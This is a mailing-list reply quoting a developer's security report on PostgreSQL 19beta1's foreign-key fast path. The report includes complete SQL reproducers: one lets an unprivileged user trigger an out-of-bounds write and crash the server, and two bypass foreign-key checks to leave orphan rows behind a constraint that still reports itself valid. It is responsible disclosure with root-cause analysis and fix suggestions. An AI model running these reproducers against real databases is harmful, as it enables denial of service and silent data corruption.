On Sat, Jun 6, 2026 at 17:31 Nikolay Samokhvalov <[email protected]> wrote:
> Hi hackers, > > > The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs > user-defined code in the middle of a deferred batch flush, which yields at > least three defects reachable by an unprivileged table owner. Present in > master and verified inREL_19_BETA1. > > > I identified these issues during recent security research with LLMs. While > they have clear security implications (OOB write, integrity bypass), > reporting them here because they are isolated to 19beta1, absent in PG18 > and earlier; I don't have patches, only reproducibility. > > > Mechanism: > > > For an INSERT/UPDATE on the referencing side the fast path buffers rows > in a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint > OID) and probes the PK index in groups, flushing when a > > per-constraint buffer reaches RI_FASTPATH_BATCH_SIZE (64) or when the > > trigger-firing pass ends (ri_FastPathEndBatch, an > AfterTriggerBatchCallback). For a cross-type FK the flush calls the > column's cast function (ri_FastPathFlushArray, the FunctionCall3 at line > 3069) and the equality operator -- arbitrary user code, mid-flush. Line > numbers below are from a REL_19_BETA1 build (commit 4b0bf07). > > > Unprivileged vehicle (defects 1 and 3). No superuser, no contrib: a role > creates > a type it owns and an IMPLICIT cast from it to the PK type with a PL/pgSQL > function, which ri_HashCompareOp wires into the fast path's cast > > slot. Below uses a composite type. Default btree opclass, ordinary > single-column > FK, no GUC (fast path is unconditional for non-partitioned, non-temporal > FKs, per ri_fastpath_is_applicable). > > > > 1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry > > > The write precedes the bound check, and batch_count is reset to 0 only at end > of flush (ri_FastPathBatchFlush, line 2971), so it is 64 throughout a > full-batch > flush: > > > fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot); > > fpentry->batch_count++; > > if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE) > > ri_FastPathBatchFlush(fpentry, fk_rel, riinfo); > > > There is no re-entrancy guard and ri_FastPathGetEntry returns the same entry, > so user code that does DML on the same table during a full-batch flush > re-enters with batch_count == 64 and writes batch[64], one past the > > array, overwriting the adjacent batch_count field (struct layout, lines > 250-251). A single re-entrant row only stomps batch_count, which is then reset > to 0 before reuse; the crash manifests once the re-entrant insert is > > itself large enough to fill and flush a batch, so the stomped batch_count > is used as an array index (batch[garbage]) and as nvals in memset(matched, > 0, nvals * sizeof(bool)) (line 3054). > > > Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0; > under -O2 the out-of-bounds write is of undefined effect): > > > create table parent(id int primary key); > > insert into parent select g from generate_series(1,2000) g; > > create type vch as (v int); > > create function vcast(vch) returns int language plpgsql as $$ > > begin > > if $1.v = 64 then > > insert into child select row(g)::vch from > generate_series(1001,1064) g; > > end if; > > return $1.v; > > end$$; > > create cast (vch as int) with function vcast(vch) as implicit; > > create table child(a vch); > > alter table child add constraint child_fkey > > foreign key (a) references parent(id); > > insert into child select row(g)::vch from generate_series(1,64) g; -- > crash > > -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count > holding a > > -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote > > -- batch_count; backend SIGSEGVs and the cluster restarts. > > > > 2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort > > > On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache: > > > ri_fastpath_cache = NULL; > > ri_fastpath_callback_registered = false; > > > But batch[] holds outstanding rows of the enclosing transaction, not the > aborting > subxact. An internal subxact abort during after-trigger firing (PL/pgSQL > BEGIN ... EXCEPTION) drops the buffered rows unflushed; their FK checks > never run and orphans commit behind a constraint that still reports itself > valid. No cast needed: > > > create table pk(id int primary key); > > create table fk(a int, tag text); > > insert into pk select g from generate_series(1,10) g; > > alter table fk add constraint fk_a_fkey foreign key (a) references > pk(id); > > create function abort_subxact() returns trigger language plpgsql as $$ > > begin > > if NEW.tag = 'boom' then > > begin perform 1/0; exception when others then null; end; > > end if; > > return NEW; > > end$$; > > create trigger fk_after after insert on fk > > for each row execute function abort_subxact(); > > insert into fk values > (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok'); > > -- INSERT 0 5, no error > > select f.a from fk f left join pk p on f.a=p.id where p.id is null; > > -- a > > -- ----- > > -- 999 > > -- 0 (orphans) > > > -- the constraint still reports itself valid, and re-validation passes > > -- while the orphans remain: > > select convalidated from pg_constraint where conname = 'fk_a_fkey'; > > -- convalidated > > -- -------------- > > -- t > > alter table fk validate constraint fk_a_fkey; > > -- ALTER TABLE (succeeds; does not re-scan committed rows) > > select f.a from fk f left join pk p on f.a=p.id where p.id is null; > > -- 999, 0 (orphans still present) > > > Controls (no EXCEPTION; between-statement SAVEPOINT; DEFERRABLE INITIALLY > DEFERRED) > all behave correctly (FK violation raised, no orphans). The whole statement's > buffered batch is discarded, not just the aborting row's check. The abort > path also emits "WARNING: resource was not closed" (relation / > > index / TupleDesc), a resource leak consistent with the missing flush. > > > > 3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check > > > EndBatch flushes by iterating the cache with hash_seq_search (line 4143). If > flush-time user code INSERTs into a different fast-path FK table, > ri_FastPathGetEntry > adds a new cache entry mid-scan; it can land in a bucket hash_seq_search > already passed and is never reached. ri_FastPathTeardown (line 4165) then > hash_destroys the cache (line 4188) without flushing entries that still > have batch_count > 0, so that buffered check is discarded. This survives a > > per-entry guard for [1] (different entry, not a re-entry of the busy one): > > > create table parent(id int primary key); > > insert into parent select g from generate_series(1,64) g; > > create table child2(a int); > > alter table child2 add constraint child2_fkey > > foreign key (a) references parent(id); > > create type vch as (v int); > > create function vcast(vch) returns int language plpgsql as $$ > > begin > > if $1.v = 1 then > > insert into child2 values (999999); -- orphan into a > *different* FK > > end if; > > return $1.v; > > end$$; > > create cast (vch as int) with function vcast(vch) as implicit; > > create table child(a vch); > > alter table child add constraint child_fkey > > foreign key (a) references parent(id); > > insert into child values (row(1)::vch); -- flushed at > ri_FastPathEndBatch > > select a from child2 where a not in (select id from parent); -- => > 999999 > > -- control: INSERT INTO child2 VALUES (999999); -- correctly raises > FK error > > > > Root cause / thoughts: > > > All three stem from invoking user cast/operator code inside a deferred batch > flush: while a per-entry batch is half-updated [1], while a cache-wide > hash_seq_search > is in progress and teardown drops non-empty entries [3], and against a > subxact-abort invalidation that cannot tell parent-xact rows from > aborted-subxact > rows [2]. > > > - [1] Bound-check before the write in ri_FastPathBatchAdd, and add a > "flushing" > flag to RI_FastPathEntry, rejecting re-entrant modification of a busy > entry (a nested per-row probe is unsafe: the flush may hold PK-index buffer > locks). > > - [3] Loop-flush in ri_FastPathEndBatch until no entry has batch_count > > 0, and/or flush non-empty entries in ri_FastPathTeardown before > hash_destroy. > > - [2] Do not discard outstanding parent-xact rows on > SUBXACT_EVENT_ABORT_SUB; track the buffering subxact, or flush > immediate-constraint batches subxact boundaries. > > - Unifying: a global "in fast-path flush" guard routing any re-entrant FK > check > to the immediate per-row path, and reconsidering running user code mid-flush > at all. > > > Nik > Thanks for the detailed report and reproducers. I’ve started looking into this. - thanks, Amit >
